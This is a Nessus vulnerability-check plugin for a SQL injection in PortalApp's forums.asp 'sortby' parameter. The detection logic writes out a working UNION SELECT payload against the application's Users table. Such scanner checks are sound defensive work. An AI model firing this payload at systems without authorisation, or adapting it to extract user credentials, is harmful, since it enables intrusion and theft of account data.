#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29897);
  script_version("$Revision: 1.1 $");

  script_bugtraq_id(27170);

  script_name(english:"PortalApp sortby Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to influence the forum search results returned");

  desc = "
Synopsis :

The remote web server contains an ASP script that is prone to a SQL
injection attack. 

Description :

The remote host is running PortalApp, a CMS and portal system written
in ASP. 

The version of PortalApp installed on the remote host fails to
sanitize input to the 'sortby' parameter of the 'forums.asp' script
before using it in a database query.  An unauthenticated attacker may
be able to exploit this issue to manipulate database queries, leading
to disclosure of sensitive information (such as users and their
passwords defined to the affected application), modification of data,
or attacks against the underlying database. 

The application is also reportedly affected by similar issues in
several other scripts, although Nessus has not tested for them. 

See also :

http://www.milw0rm.com/exploits/4848

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_asp(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/portalapp", "/portal", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to manipulate the search results returned.
  magic1 = unixtime();
  magic2 = rand() % 0xffff;
  magic3 = rand() % 10;
  magic4 = rand() % 0xffff;
  exploit = string(" UNION SELECT 1,2,3,4,5,", magic1, ",", magic2, ",8,9,10,", magic3, ",", magic4, ",13,14,15 FROM Users");

  req = http_get(
    item:string(
      dir, "/forums.asp?",
      "keywords=", SCRIPT_NAME, "&",
      "do_search=1&",
      "sortby=users.user_name", urlencode(str:exploit)
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # it's PortalApp and...
    (
      "<!-- PortalApp" >< res ||
      " alt='powered by PortalApp'" >< res
    ) &&
    # we see our magic in the answer.
    string(' title="10">', magic1, "</A") >< res &&
    string("class=dataFont>", magic2, "</a>") >< res &&
    string('\t', magic3) >< res &&
    string('\t', magic4) >< res
  )
  {
    security_hole(port);
    exit(0);
  }
}
